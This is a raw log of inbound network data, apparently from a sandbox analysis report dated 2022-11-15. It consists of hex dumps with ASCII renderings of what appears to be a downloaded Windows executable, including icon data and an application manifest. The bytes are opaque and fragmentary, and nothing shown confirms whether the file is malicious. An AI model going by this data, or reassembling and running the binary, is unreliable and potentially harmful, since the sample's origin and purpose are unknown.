                                                                                                                                                  2022-11-15 17:54:38 UTC1360INData Raw: 39 59 c8 8b a0 61 38 a1 34 26 61 4a cf f7 5a 62 68 0c be d6 83 f6 1b 28 d8 24 f8 58 7b cc 96 c2 9e 72 36 71 16 e2 a5 1d d4 a5 6b 11 3b 03 3a 27 8a 60 47 2e b2 19 59 4e c9 a0 df 4a 01 76 7b e1 70 eb 07 cc 53 aa 60 95 d9 20 3c 7c 7d fb 34 a0 05 85 27 47 bb e8 a2 a6 8e ee 3b 71 64 05 cf 4e 4e a7 3c 47 04 7c b2 04 5f 35 cc ad 34 bb 9c 0e a7 0d 33 71 e8 ad 4b 7d 2b 32 34 83 6e 79 b7 58 3e bc 1b 92 e6 42 6c 34 a6 25 49 6a e9 0d 17 e8 92 43 8e 79 e8 b9 65 63 d6 a6 da c0 57 a2 ad 59 8e 4b 09 a1 2a b6 78 77 bb 64 10 0f e5 27 62 85 1c d7 9c b3 1b 57 a4 56 cb 72 09 cb ea 5c a4 0a d5 5a fd 58 a0 9c 82 5d 6e 30 d1 c8 0b db a3 70 40 da 7a e2 13 c5 22 13 df 23 ea c7 6a ed 1f 02 e8 d3 af 86 36 22 73 19 9f 94 f7 1a f0 38 db dc 9b fa f9 81 bd a1 3d 14 91 0a 3e a1 1c 8b df
                                                                                                                                                  Data Ascii: 9Ya84&aJZbh($X{r6qk;:'`G.YNJv{pS` <|}4'G;qdNN<G|_543qK}+24nyX>Bl4%IjCyecWYK*xwd'bWVr\ZX]n0p@z"#j6"s8=>
                                                                                                                                                  2022-11-15 17:54:38 UTC1376INData Raw: 4c 2d 7b 90 7c 66 fb ad 8d 31 c0 5b 3d 7d 70 a3 74 8d ce 89 eb 29 ea 2c 3f e0 8e 6b 27 63 a0 69 b1 d6 c8 eb 4c 14 ff 2e 3d 3e 9a be d9 0b 42 83 5e 19 9b 45 45 23 d3 86 40 9f 0b 65 fb 55 46 7b 85 49 1a 22 97 f3 20 c1 c5 41 1f f7 b0 2b d4 ee ca 53 5b cd 25 4d 8f 8d ac 2d 22 c0 ef 9d c3 bc d6 d2 00 17 67 4e 17 bc 1e ca 03 f6 e8 d7 ac 8b f5 68 01 92 1d d2 4f 47 cc 0c 92 9c 3e 38 13 28 10 43 29 01 15 75 78 d1 67 88 17 bd 8d 7f 18 2e 0d e5 83 a8 a0 c0 2e 27 51 be 18 6e ef f7 96 d5 05 92 84 f3 75 b8 98 12 39 94 19 bd a8 5c 21 68 e5 e4 c4 68 f4 45 0b 76 8e c8 ac c0 a2 a4 b0 98 e9 c4 e7 84 a2 2d 17 ff b6 f3 af 18 3f 2a 4d a4 31 1c ee 35 b5 18 c6 1e dc ed f3 66 f5 41 87 cc f7 ff a9 f4 77 1a 73 b7 85 e4 47 99 4f c5 f1 fa 95 0e fe 77 c0 56 8e 30 a5 81 5e 8c ab 0e fb
                                                                                                                                                  Data Ascii: L-{|f1[=}pt),?k'ciL.=>B^EE#@eUF{I" A+S[%M-"gNhOG>8(C)uxg..'Qnu9\!hhEv-?*M15fAwsGOwV0^
                                                                                                                                                  2022-11-15 17:54:38 UTC1392INData Raw: a2 d3 e4 27 2e 45 3d ef 1a 20 7b f1 8c a7 14 b7 5a da b0 3e 40 1c af 76 7b 95 9e 10 01 fd 47 5f e7 12 84 a5 56 81 3c a1 6a e9 55 c0 fd 4e e7 d5 36 61 82 d0 52 26 9f 8a dc d9 6b f1 df 4a b0 30 f2 d4 fe 72 30 b7 46 e6 7d 3d 60 b5 55 b3 2a 4f 67 81 c4 22 9d 14 af 3a 58 d5 e8 12 be 93 21 36 03 59 6b 79 e4 fd 24 16 2e 17 08 b6 db a9 10 7a 0c a8 29 90 2c 30 27 de 1d 20 41 e9 88 b3 5b b7 29 3c f8 c3 9d e3 b0 06 84 b7 92 3e ac 4f 81 a1 b7 58 e8 e8 f0 03 99 f3 dd ec 1f 64 67 6d 39 e6 6c 64 a1 7f 4a fa e8 a0 3f 3d 0d e3 20 ba 77 a0 45 34 64 ff 19 59 80 54 1b ea a0 0d a2 65 2f af 1a a3 93 9b 4b 79 70 76 ff 23 fa 24 24 d6 b0 d6 fa 48 aa e3 c3 e5 92 53 f0 eb af b1 f1 02 4a 65 2c 9f 30 e2 e6 0b 8d 74 a5 e2 f9 36 10 f2 0d 40 de 6c 38 ea 91 b7 6d 8c 2a 5a 71 78 d4 73 80
                                                                                                                                                  Data Ascii: '.E= {Z>@v{G_V<jUN6aR&kJ0r0F}=`U*Og":X!6Yky$.z),0' A[)<>OXdgm9ldJ?= wE4dYTe/Kypv#$$HSJe,0t6@l8m*Zqxs
                                                                                                                                                  2022-11-15 17:54:38 UTC1408INData Raw: 49 3e c5 90 34 dd 77 8a 71 80 59 9d f3 60 50 9b c4 1f 34 6a 38 e5 29 60 f2 ab 8b 95 b0 01 4c 87 2d cc f2 bf 42 c5 74 1d ab 45 ea 6c 7f 14 70 ab df 2b 11 13 aa 41 9d 6a 48 a7 b5 8c 59 19 6c cf a4 2c 73 07 87 22 d6 aa 83 fc 44 c8 01 63 8f 6c 64 b3 a7 4f 12 2f e0 9e 76 51 ae ec 91 5c 05 76 4a 77 36 66 96 96 be 1f f9 c2 3f ee ef 8b 6b d9 2b 29 3b 9b 33 dc 8f 0c 41 62 bc 7e 5c 02 71 a2 70 c7 4c 4b 7c bd 4b 7b a7 eb 23 b1 70 19 9e d9 df 3a 3d cf eb cb e7 58 21 e3 70 5b ec cb e4 ec ab a0 11 cd 8f f8 91 08 bc fe c9 10 fa c3 66 db 49 5c 55 23 77 f3 93 2f f4 07 f0 93 25 ab 60 9b 70 03 ef a1 32 7b c5 2a 29 4f 45 45 2f 12 9b e6 78 4a 19 22 86 86 4f 6e 32 71 a8 cd 88 32 91 eb 56 b6 3e 7d b2 d3 32 60 33 86 b6 f5 27 46 0b d6 3d 70 cb 80 26 26 60 ac 91 81 6b 95 db 99 b5
                                                                                                                                                  Data Ascii: I>4wqY`P4j8)`L-BtElp+AjHYl,s"DcldO/vQ\vJw6f?k+);3Ab~\qpLK|K{#p:=X!p[fI\U#w/%`p2{*)OEE/xJ"On2q2V>}2`3'F=p&&`k
                                                                                                                                                  2022-11-15 17:54:38 UTC1424INData Raw: 49 c3 bd 06 6e c6 c0 08 6e c6 c0 08 6e c6 c0 08 6e c6 c0 08 6e c6 c0 08 6e c6 c1 08 6e c6 c0 07 6e c4 bd 03 6e be b5 fa 6d bc b1 f6 6d c2 bb 01 6e c6 bf 06 6e c6 c0 07 6e c3 bc 02 6e bd b4 f9 6d b8 ad f0 6d b8 ac ef 6d b7 ab ee 6d b9 ad f1 6d be b5 fa 6d be b4 f9 6d bb b0 f4 6d b9 ae f1 6d b0 a0 e1 6d aa 99 d8 6d b5 a8 ea 6d b7 ab ee 6d b8 ab ef 6d be b5 fb 6d c3 bc 03 6e c6 c0 07 6e c6 c0 07 6e c6 c0 07 6e c6 c0 07 6e c6 c0 07 6e c6 c0 07 6e c6 c0 07 6e c6 c0 07 6e c3 bd 05 6e bd b4 fd 49 97 7e bb b9 63 32 5e 7c 63 32 5e 73 63 32 5e 74 63 32 5e 7d 98 7e bb ba be b6 ff 49 c5 bf 07 6e c9 c3 09 6e c9 c3 09 6e c8 c2 09 6e c8 c2 09 6e c8 c2 09 6e c9 c3 09 6e c8 c2 08 6e c6 be 04 6e ba ae f1 6d b3 a4 e5 6d bd b2 f6 6d c5 bd 03 6e c8 c1 07 6e c3 b9 ff 6d b6 a9
                                                                                                                                                  Data Ascii: InnnnnnnnnmmnnnnmmmmmmmmmmmmmmmnnnnnnnnnnI~c2^|c2^sc2^tc2^}~Innnnnnnnnmmmnnm
                                                                                                                                                  2022-11-15 17:54:38 UTC1440INData Raw: 6e e1 d8 20 6e dd d4 1d 30 dd d4 1d ad de d4 1d 6f de d4 1d 6f 63 32 5e 6e 63 32 5e 6e e0 d7 1f 6f e0 d7 1f 6f df d6 1e ad df d6 1e 30 e3 da 22 6e e9 e2 28 6e ed e6 2c 6e ed e6 2c 6e ed e6 2c 6e ed e6 2c 6e ed e6 2c 6e ed e6 2c 6e ed e6 2c 6e ed e6 2c 6e ed e6 2c 6e ed e6 2b 6e ed e6 2b 6e ed e6 2b 6e ed e6 2b 6e ed e6 2b 6e ed e6 2b 6e ed e6 2b 6e ed e6 2b 6e ed e6 2b 6e ed e6 2b 6e ed e6 2b 6e ed e6 2b 6e ed e6 2b 6e ed e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e6 2b 6e ec e5 2b 6e ec e5 2b 6e ec e5 2b 6e ec e5 2b 6e ec e5 2b 6e ec e5 2b 6e ec e5 2b 6e ec e5 2b 6e ec e5 2b 6e ec e5 2b 6e ec e5 2b 6e e9 e1
                                                                                                                                                  Data Ascii: n n0ooc2^nc2^noo0"n(n,n,n,n,n,n,n,n,n,n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n+n
                                                                                                                                                  2022-11-15 17:54:38 UTC1456INData Raw: 6e 4a 33 41 6f d2 32 8c 6e 83 32 ad 6e 83 32 c7 6e d1 32 d1 6e d7 32 bf 6e cf 32 bf 6e c7 32 cd 6e d5 32 7e 6e c7 32 cd 6e 83 32 83 6e 94 32 7f 6e d6 32 7f 6e 83 32 d0 6e c8 32 cf 6e d8 32 c3 6e d5 32 7e 6e d2 32 7e 6e ba 32 c7 6e d1 32 c2 6e d2 32 d5 6e d6 32 7e 6e 95 32 8e 6e 93 32 8e 6e 83 32 b1 6e c8 32 d0 6e d9 32 c7 6e c6 32 c3 6e 83 32 ae 6e c4 32 c1 6e ce 32 7e 6e 97 32 7e 6e d2 32 d3 6e 83 32 ce 6e d2 32 d1 6e d7 32 c3 6e d5 32 c7 6e d2 32 d0 6e 91 32 5e 6e 63 32 5e 6e 63 32 5e 6e 63 32 5e 6e 63 32 5e 6e 63 32 5e 6e 63 32 5e 6e 73 32 ad 6e d0 32 bf 6e cb 32 bf 6e a6 32 cd 6e d0 32 ce 6e c4 32 cc 6e dc 32 ac 6e c4 32 cb 6e c8 32 78 6e b3 32 d0 6e d2 32 c5 6e d5 32 bf 6e d0 32 7e 6e c7 32 c3 6e 83 32 c7 6e d1 32 d1 6e d7 32 bf 6e cf 32 bf 6e d5 32
                                                                                                                                                  Data Ascii: nJ3Ao2n2n2n2n2n2n2n2~n2n2n2n2n2n2n2n2~n2~n2n2n2n2~n2n2n2n2n2n2n2n2n2~n2~n2n2n2n2n2n2n2^nc2^nc2^nc2^nc2^nc2^nc2^ns2n2n2n2n2n2n2n2n2xn2n2n2n2~n2n2n2n2n2n2
                                                                                                                                                  2022-11-15 17:54:38 UTC1472INData Raw: ff 80 ab c4 ff 80 ab c4 ff 7b a4 bf e2 72 9b b8 1f 78 a0 bd 1f 82 ab c6 e2 88 b2 cc ff 87 b2 cb ff 88 b2 cb ff 88 b1 cb ff 88 b1 cb ff 87 b1 cb ff 87 b1 cb ff 87 b2 cb ff 87 b2 cb ff 87 b1 cb ff 87 b1 cb ff 87 b1 cb ff 81 aa c5 e2 78 9f bc 1f 7d a5 c2 1f 88 b1 cc e2 8f b9 d2 ff 8e b9 d2 ff 8e b9 d2 ff 8e b9 d2 ff 8e b9 d2 ff 99 bf d6 ff 98 bf d5 ff 8e b8 d2 ff 8e b8 d1 ff 8e b8 d1 ff 8d b8 d1 ff 8e b8 d1 ff 87 b1 cb e2 7d a5 c1 1f 80 a8 c4 1f 8c b5 cf e1 95 be d7 ff 96 bf d7 ff 97 bf d8 ff 97 bf d8 ff 98 c0 d8 ff b1 cf e2 ff b1 cf e1 ff 98 c0 d8 ff 97 bf d8 ff 97 bf d8 ff 96 be d7 ff 95 be d7 ff 8c b5 cf e1 80 a7 c4 1f 6b 97 b8 15 7e a6 c3 c7 8d b1 cb ff 92 b4 cd ff 94 b6 cf ff 94 b6 ce ff 95 b7 ce ff a7 c3 d7 ff a7 c3 d7 ff 95 b7 cf ff 94 b7 cf ff 94 b6
                                                                                                                                                  Data Ascii: {rxx}}k~
                                                                                                                                                  2022-11-15 17:54:38 UTC1488INData Raw: ff 5e 89 a5 ff 5e 89 a5 ff 5e 89 a5 ff 5e 89 a5 ff 5e 89 a5 ff 5e 89 a5 ff 5e 89 a5 ff 5d 88 a4 ff 5a 85 a2 ff 55 7e 9b c8 40 5e 74 54 00 00 00 12 00 00 00 06 00 00 00 03 00 00 00 04 00 00 00 08 00 00 00 15 3f 5d 72 58 57 7f 9c ca 5d 87 a4 ff 60 8b a7 ff 61 8c a8 ff 61 8c a8 ff 61 8c a8 ff 61 8c a8 ff 61 8c a8 ff 61 8c a8 ff 61 8c a8 ff 61 8c a8 ff 61 8c a8 ff 61 8b a7 ff 60 8a a5 ff 5e 88 a3 ff 5e 88 a3 ff 60 8a a6 ff 61 8c a7 ff 61 8c a8 ff 61 8c a7 ff 60 8b a7 ff 5f 8a a5 ff 5e 88 a3 ff 5d 87 a1 ff 5d 86 a1 ff 5d 86 a1 ff 5d 86 a1 ff 5d 87 a2 ff 5f 89 a4 ff 5f 89 a4 ff 5f 89 a4 ff 5c 85 9f ff 58 80 98 ff 52 77 8e ff 4b 6c 81 ff 4d 6f 85 ff 58 7f 97 ff 5d 87 a1 ff 5d 86 a0 ff 5d 87 a0 ff 5f 89 a3 ff 60 8b a5 ff 61 8c a6 ff 61 8c a7 ff 61 8c a7 ff 61 8c
                                                                                                                                                  Data Ascii: ^^^^^^^]ZU~@^tT?]rXW]`aaaaaaaaaa`^^`aaa`_^]]]]]___\XRwKlMoX]]]_`aaaa
                                                                                                                                                  2022-11-15 17:54:38 UTC1504INData Raw: 00 72 00 61 00 6e 00 73 00 6c 00 61 00 74 00 69 00 6f 00 6e 00 00 00 00 00 09 04 b0 04 9c e3 19 00 8e 04 00 00 00 00 00 00 00 00 00 00 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0a 3c 61 73 73 65 6d 62 6c 79 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 33 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 33 22 3e 0a 20 20 3c 61 73 6d 76 33 3a 61 70 70 6c 69 63 61 74 69 6f 6e 3e 0a 20 20 20 20 3c 61 73 6d 76 33 3a 77 69 6e 64 6f 77 73 53 65 74 74 69 6e 67 73 20 78
                                                                                                                                                  Data Ascii: ranslation<?xml version="1.0" encoding="utf-8"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv3="urn:schemas-microsoft-com:asm.v3"> <asmv3:application> <asmv3:windowsSettings x
                                                                                                                                                  2022-11-15 17:54:38 UTC1520INData Raw: cb bd 59 a4 4c be 2d ee 82 1b 48 68 03 4e 00 48 83 d4 32 36 cf 2a 62 00 51 9f d9 ba 94 8f 34 07 96 fd 1c 48 12 06 1c e1 00 6c 49 86 d5 fc 98 0c 24 87 e2 67 b0 07 5c d7 57 c3 50 f1 ea 01 18 ab ec 12 82 36 7f d3 83 52 2a cd 09 60 00 cf ce 78 ad 2a 4d 73 ae e2 17 18 8a 6c ff 72 b3 5e c2 29 9b 5a a2 48 7c 5b da 00 d8 d7 c1 de 9a b5 1d 74 00 fd 93 27 70 ee 88 43 f2 4e 50 20 ed af 64 fd dd 10 58 49 51 4b 6e 20 5f 8e 0b 7a b0 28 04 a0 2e 22 0d be 46 9c 36 bc 9f d5 d0 92 09 00 ec 49 07 0e 40 ad 5f 91 e4 f8 57 a0 68 f1 86 02 66 95 fb c6 d6 a5 d0 3d 2d e1 f8 f0 36 2e c8 79 3b 41 8a 83 51 03 df d4 00 1a c3 5f 5d fc 0f fd 2a 0b fa 6e ef 6a cf 30 13 0f 40 f0 0c 7c d3 b7 fc 03 55 5f 9a 96 ef fb 90 04 4c 18 84 4b e1 08 b9 d9 60 59 c5 8e 6c 00 9e 6f 12 60 a1 bf a6 24 80
                                                                                                                                                  Data Ascii: YL-HhNH26*bQ4HlI$g\WP6R*`x*Mslr^)ZH|[t'pCNP dXIQKn _z(."F6I@_Whf=-6.y;AQ_]*nj0@|U_LK`Ylo`$
                                                                                                                                                  2022-11-15 17:54:38 UTC1536INData Raw: 24 59 06 3e 39 1e 3e e5 eb ea 55 94 66 9d 18 ab c6 1e 84 23 c7 96 2f c6 7e ec 04 aa 60 d6 8a 15 e7 10 13 c7 80 dd 98 7a 99 4c d9 6b 2b ca 2b 4e 94 38 bf 09 f4 8e 54 6f eb d3 5e 89 30 02 d4 df ce d3 a2 a0 42 e6 97 ac ef 83 21 ff 2b 16 3c e7 db e2 65 d2 fe 49 19 7e 5e ed 53 f5 ab 71 cc df 29 3e 17 1d a6 f7 15 e7 24 79 d3 ab 74 5e e3 83 62 5d f7 09 76 31 ef be e5 59 e6 a7 42 39 30 eb 01 c6 9d c6 65 27 8b 1e 70 d6 bf 94 6b d3 84 fd 2b 92 31 4b 09 cf 2a 99 6a 0d f7 fb 13 a3 c1 08 bc ee a1 8b 31 68 ae 27 f1 94 24 4f e3 bc 4f a2 31 fe f1 2f cf eb a7 55 38 d7 e1 2b 25 58 49 fd bb 8c f0 d3 87 20 5a 2b 28 fc f3 f0 ce 00 4d 54 57 2e 39 33 ba 47 27 50 4a f6 f1 52 09 ea 24 b1 61 45 21 10 70 46 09 6b c3 25 84 14 45 a9 a5 fd bc 80 92 55 b5 3b 3b df 35 04 ed 02 c5 8f 07
                                                                                                                                                  Data Ascii: $Y>9>Uf#/~`zLk++N8To^0B!+<eI~^Sq)>$yt^b]v1YB90e'pk+1K*j1h'$OO1/U8+%XI Z+(MTW.93G'PJR$aE!pFk%EU;;5
                                                                                                                                                  2022-11-15 17:54:38 UTC1552INData Raw: 8d c2 c9 56 9e d8 20 32 39 88 6a 38 2a e3 cb c1 74 d3 10 02 e9 18 11 40 00 d6 62 5b 52 1a a0 a1 3f 03 c5 20 de 2a 23 bc d8 8d 47 db 05 b7 ca c2 a7 78 8c 72 4e a1 24 56 22 8e 04 eb 41 f4 f2 04 35 8a c4 1d e4 a0 84 3e 33 dc c0 9c 1c 75 05 14 81 a8 cb fd fc da ff 21 59 0e 00 15 02 72 f5 bc ff 58 3b 86 1f a1 bf dc 17 c6 81 d9 0a 8e 26 ad 93 01 13 6e fc cd 80 a4 3a f4 e2 0e 9a 42 37 4b 5c 18 be d7 f9 c6 a5 73 4c af 06 09 ba 80 77 17 18 00 d4 57 cb f5 81 f2 b2 86 04 9e f3 ea 9b 15 b0 a5 73 67 13 0c 09 60 29 81 ba d2 01 7a b6 42 ef 9a 67 3d 2a d8 ca a7 06 ed 9e ab 42 6a 10 0c 77 cf 07 06 44 b4 60 ad 76 46 6e 93 1d 0c 67 53 a8 34 1c 8c 03 dc b1 1f 52 24 0a 81 06 b2 86 40 84 c8 17 e9 00 ef 0c 9c 87 3e 79 41 a0 0a 6d 75 f0 25 e2 09 5f 5c 5c ae e0 8d 69 39 98 1d e9
                                                                                                                                                  Data Ascii: V 29j8*t@b[R? *#GxrN$V"A5>3u!YrX;&n:B7K\sLwWsg`)zBg=*BjwD`vFngS4R$@>yAmu%_\\i9
                                                                                                                                                  2022-11-15 17:54:38 UTC1568INData Raw: c5 36 f2 4c 9c b3 06 dd 53 c1 a2 25 2c 3e a1 2f 5a 73 86 83 51 45 cf d7 dd f0 bf 9c cd 70 05 3b ea 57 82 6c d9 33 9a bb 60 f1 40 1d 03 a7 bd 7a 31 d2 b1 d6 db 28 9f 0e 06 09 3d 66 36 1e 09 7a dc c3 32 14 df 61 d4 5c d9 a1 47 57 7f 1e f0 0d 0a 50 4b c0 8e 4f 5f d7 89 8f 9a 03 08 eb bc df 03 00 40 3c 14 35 49 45 01 61 80 19 f9 12 c2 8a 3f 21 3c 9c 07 2b a0 05 f8 44 38 37 00 3a b1 36 96 0f 1f 13 da 0f 83 ab e6 2f 2b 4b 8d 96 aa 3a 09 b3 f8 81 b2 9f 94 93 2a e7 a1 00 e5 65 17 eb 6e e3 28 42 9d 01 7c 31 23 ad d7 fb 2a a4 4a b3 18 6f 26 f6 ba 67 3c 00 c4 3a e6 76 fb fc 95 46 a1 1e eb 6c ac 4b 21 63 a7 cb ec 9f 26 0e d7 71 22 60 65 48 d3 fe 06 ef 69 80 3d 16 dd 1f 83 08 b7 95 9d d6 c0 b0 99 40 b4 de 9d a0 ca 54 21 05 4a 49 ac 03 8d e0 20 07 77 3a 9f f2 71 7e 92
                                                                                                                                                  Data Ascii: 6LS%,>/ZsQEp;Wl3`@z1(=f6z2a\GWPKO_@<5IEa?!<+D87:6/+K:*en(B|1#*Jo&g<:vFlK!c&q"`eHi=@T!JI w:q~
                                                                                                                                                  2022-11-15 17:54:38 UTC1584INData Raw: c2 dd a0 ad 92 6a 11 66 01 da ab b3 04 4b e8 18 83 1d 35 9e e9 d0 00 56 aa ef 7f 0f 8b 1b 76 b6 c9 00 c0 d7 a9 e7 e1 1e 00 80 3c a2 32 c6 96 55 64 0c 09 90 04 33 48 bf 5b cc ec e2 c8 bc 00 3a 22 86 73 ab 19 84 45 1e d4 20 57 37 2f 17 1b 90 5c e7 0c e6 ce 2c e9 72 ea a2 69 8c e2 99 ed 04 df 09 1d e7 76 88 38 8b 68 c1 f4 08 0c 39 34 5e 09 61 cc 4c 1e 05 18 11 ad 8f 80 68 fa ff a1 d3 8e 1f 30 1b 82 30 8c de 54 06 6a 61 79 1d a2 14 f2 ef 01 c4 98 8f 7b d2 80 10 73 0d 00 be 0e 3a 6a b4 61 6f 40 8d e9 bf f9 70 25 58 f6 a8 9b 61 5a 05 c6 8b 81 1a 22 a0 a5 b1 e4 91 c5 66 d4 b5 ad d6 0c 9c 63 e3 40 e1 3f e8 62 24 b3 04 84 2d 29 30 40 bf 5b 61 a0 74 02 3f 5c e1 1d b3 40 7b 29 00 51 eb af 11 ee 45 44 5b f4 00 39 6f 1d ad be 58 e5 40 00 88 a8 43 b1 fb 03 b3 3a 52 18
                                                                                                                                                  Data Ascii: jfK5Vv<2Ud3H[:"sE W7/\,riv8h94^aLh00Tjay{s:jao@p%XaZ"fc@?b$-)0@[at?\@{)QED[9oX@C:R
                                                                                                                                                  2022-11-15 17:54:38 UTC1600INData Raw: 55 5c 74 50 2b 02 bb f6 97 c7 62 a8 28 a4 5e 02 21 e7 7e 7c d2 ca c7 b3 27 7d 6e f4 f1 48 7e e9 88 09 ff b6 9f e9 d9 14 64 01 ef c2 70 1c ec 1b bc a9 6b cc 62 f9 6c 1b a5 86 d2 8c 9d cc 32 9d 7d 33 f9 c2 0a 96 94 9f 52 12 4b 31 29 5b e8 02 25 ef e2 fb a1 b4 32 aa b8 5a a4 ab b2 35 13 c1 e0 0b 3d cf 63 d9 ea f0 d9 0d 42 01 c3 74 f2 6c 90 8b 4e 03 b6 ce 4e ae 8c d0 ca a9 4a c2 3a be 32 d5 f2 1a 75 7e 13 cf ca 0f 81 64 af 41 09 ca 8b 3f d1 da 6b 36 30 30 43 3e 5f a8 7c e4 ae d8 3d f6 4e 84 29 7c 7b 63 4f d4 1a 0d 8b 1f 36 cc e0 d2 ea a9 20 8b de 75 45 04 25 4e 92 70 04 9c 1a 52 77 f6 49 e9 48 41 c6 03 bd f3 8b a7 66 df ec af 95 4e 77 9d 60 ba e6 8e 91 4d ce c9 31 fb 40 24 3b 69 09 15 f1 3b 4b df e6 a4 8a 45 fd f3 98 2f e0 67 31 c6 9f 5b f7 0a f7 db 39 12 cf
                                                                                                                                                  Data Ascii: U\tP+b(^!~|'}nH~dpkbl2}3RK1)[%2Z5=cBtlNNJ:2u~dA?k600C>_|=N)|{cO6 uE%NpRwIHAfNw`M1@$;i;KE/g1[9
                                                                                                                                                  2022-11-15 17:54:38 UTC1616INData Raw: 94 1e 84 3f 3a d1 41 a8 09 39 0d 00 48 97 84 1c ba a5 bd 42 5f f1 47 e9 97 fe 82 bd 73 09 0e df d3 00 11 e1 75 89 76 41 24 13 1d 41 29 82 fa 3e ea 30 69 1b 7d 59 b8 5d 18 f3 3d 03 29 14 9c b5 7e 95 67 36 e8 15 6f 50 00 3f 8e dd 6e 09 b8 eb 58 cf 88 0c 19 3d 33 a0 ed 50 fa 15 d8 30 13 b8 40 50 b9 28 51 54 0d 74 4a 74 1c 69 3a 1d 89 e9 91 c8 73 0e fb 54 05 8d 4b 09 ac 57 da 6e d7 64 1c 14 d3 69 06 11 04 81 de 71 68 04 ac fc 00 28 d0 a6 4c 6a 18 1f 04 62 2e 5c df 18 25 bd 8e 06 45 d5 3c ba 20 4a 37 23 86 51 08 02 ab 24 2b 44 f3 27 60 0b 02 de 02 4e e5 ce a0 2c 34 90 88 b3 3b 09 21 d0 79 8a 5f 79 29 8b 68 e0 02 e5 83 d5 29 04 52 b5 d1 13 dc c6 20 3d e7 00 8e 1f 78 6a 59 36 b8 32 0c 3f bc bf a0 4d 8a 18 7e f7 07 3e 54 17 02 02 79 94 77 04 5c 40 f7 1f 18 50 6a
                                                                                                                                                  Data Ascii: ?:A9HB_GsuvA$A)>0i}Y]=)~g6oP?nX=3P0@P(QTtJti:sTKWndiqh(Ljb.\%E< J7#Q$+D'`N,4;!y_y)h)R =xjY62?M~>Tyw\@Pj
                                                                                                                                                  2022-11-15 17:54:38 UTC1632INData Raw: 60 58 5e 25 14 a7 92 0d 13 f1 5a 40 d0 b4 b8 dc a2 43 1e 32 df 4c fa cb fe c1 15 a0 54 0a 1f 04 9d c0 23 ba 95 d8 4f a6 01 cf a0 f7 6b c0 e7 0c 40 14 69 d3 2d 50 91 90 03 5b fb fa 26 63 cc 3e b7 ff 30 10 20 1c a2 42 40 0f 7d 0c 83 6a ed 1f 32 98 0f bf 66 3f a5 52 ed bb 85 09 38 a7 bb 7a 53 39 13 77 fe 25 26 58 af d5 3f ad 01 38 0a 8b 0f b4 cd ef 49 1a fd 14 86 5f 1e ea 72 71 0b d7 0c 5c 88 cf 9f de ed 59 c1 68 1c 82 ce 09 df 75 f4 58 16 e9 d8 0d 9b 95 45 33 27 7e 1c c2 c1 0a 80 76 f7 8b 12 0f 90 ef 27 29 d6 75 99 eb e9 be 66 af ff f7 99 d3 fe 3b cd 7f 2b 1c 43 a5 71 b5 6c 5a 12 97 7e 99 66 ea 74 9d d4 21 63 02 88 ec b8 e6 4e 8a 85 4b bf d9 3f 3b 8d a7 16 79 56 27 21 ff f4 f9 69 ff e4 ea 97 7f 85 4d e8 e0 71 df 9d d9 c5 b4 5a 12 81 fa 8d d7 17 73 e1 f6 21
                                                                                                                                                  Data Ascii: `X^%Z@C2LT#Ok@i-P[&c>0 B@}j2f?R8zS9w%&X?8I_rq\YhuXE3'~v')uf;+CqlZ~ft!cNK?;yV'!iMqZs!
                                                                                                                                                  2022-11-15 17:54:38 UTC1648INData Raw: ff 25 f5 66 67 bf f0 98 bf 3a 4e d4 65 16 ea a3 2a 6b 14 70 79 2d ee 27 46 1c 86 bf 95 df b1 8b 08 2b 21 57 09 fb 6e 9d 0b 3e e4 17 e3 4f a6 8a 5f 4b fa 8c ec 3f 95 de d6 42 21 ce 90 67 01 ea 97 fd 94 f6 5a 21 8c a5 ee 42 24 12 2f 04 e2 03 c8 33 92 89 5e ab 6f e5 de 88 c6 96 a5 57 91 4f 07 55 2a e8 76 c4 e6 db 50 83 4a c4 24 61 c3 c6 31 3e ce 30 27 b8 57 44 84 97 55 a8 a8 cd c3 21 d0 ea 3e 9a ca 77 59 b2 12 c0 ee 37 ea d5 28 62 aa 2d a7 3d e9 79 9a 18 7c 98 45 b9 04 1f 31 f9 c4 4f ee b3 72 25 f1 d9 a0 be aa 24 22 80 28 03 38 09 09 f1 01 c2 a2 90 c9 0e 56 fb 5b e5 ec 67 c1 2e 31 3d 6c 3b e8 a7 cd ea 4c eb 95 45 16 c1 1b af 29 58 6b e1 a5 ca af 6c 13 be f2 90 92 ab 89 f7 3a fc 0a 4f aa 61 ae e7 02 2a e9 2d 97 bf 8a a0 7c 2a f2 96 06 80 52 01 fe e5 f9 09 e8
                                                                                                                                                  Data Ascii: %fg:Ne*kpy-'F+!Wn>O_K?B!gZ!B$/3^oWOU*vPJ$a1>0'WDU!>wY7(b-=y|E1Or%$"(8V[g.1=l;LE)Xkl:Oa*-|*R
